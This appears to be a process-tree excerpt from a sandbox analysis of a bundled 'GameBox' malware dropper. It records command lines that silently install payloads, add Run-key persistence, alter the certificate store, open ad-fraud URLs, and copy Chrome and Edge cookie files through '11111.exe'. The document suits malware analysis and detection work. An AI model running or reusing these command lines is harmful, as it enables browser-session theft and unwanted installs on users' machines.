C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1996 -s 23607⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\3667653.exe"C:\Users\Admin\AppData\Roaming\3667653.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\7209319.exe"C:\Users\Admin\AppData\Roaming\7209319.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\8046740.exe"C:\Users\Admin\AppData\Roaming\8046740.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 21847⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-A2DA8.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-A2DA8.tmp\MediaBurner2.tmp" /SL5="$302D8,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-F3DBT.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-F3DBT.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Defender\VKNWWJTJZS\ultramediaburner.exe"C:\Program Files\Windows Defender\VKNWWJTJZS\ultramediaburner.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-20GJM.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-20GJM.tmp\ultramediaburner.tmp" /SL5="$302CE,281924,62464,C:\Program Files\Windows Defender\VKNWWJTJZS\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
-
C:\Users\Admin\AppData\Local\Temp\6f-697da-1d4-032ac-3d117ce4fbd54\Werocamocu.exe"C:\Users\Admin\AppData\Local\Temp\6f-697da-1d4-032ac-3d117ce4fbd54\Werocamocu.exe"8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4b9c46f8,0x7ffb4b9c4708,0x7ffb4b9c471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2444 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6052 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=39⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Users\Admin\AppData\Local\Temp\9f-24f77-838-e03b0-da4ad1a94739d\Luqafaejoly.exe"C:\Users\Admin\AppData\Local\Temp\9f-24f77-838-e03b0-da4ad1a94739d\Luqafaejoly.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\irddkzxw.nfr\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\irddkzxw.nfr\installer.exeC:\Users\Admin\AppData\Local\Temp\irddkzxw.nfr\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\irddkzxw.nfr\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\irddkzxw.nfr\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849039 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\40rzup3o.oiw\ufgaa.exe & exit9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\40rzup3o.oiw\ufgaa.exeC:\Users\Admin\AppData\Local\Temp\40rzup3o.oiw\ufgaa.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xbem5cxc.caf\anyname.exe & exit9⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\xbem5cxc.caf\anyname.exeC:\Users\Admin\AppData\Local\Temp\xbem5cxc.caf\anyname.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\xbem5cxc.caf\anyname.exe"C:\Users\Admin\AppData\Local\Temp\xbem5cxc.caf\anyname.exe" -q11⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"5⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe" -a6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 18206⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" /quiet SILENT=1 AF=715 BF=7155⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849039 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849039 /qn CAMPAIGN=""710"" " CAMPAIGN="710"6⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv yKasnM7UgUqICmWI3CBItg.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2396 -ip 23961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1328 -ip 13281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1632 -ip 16321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3192 -ip 31921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1436 -ip 14361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 4668 -ip 46681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
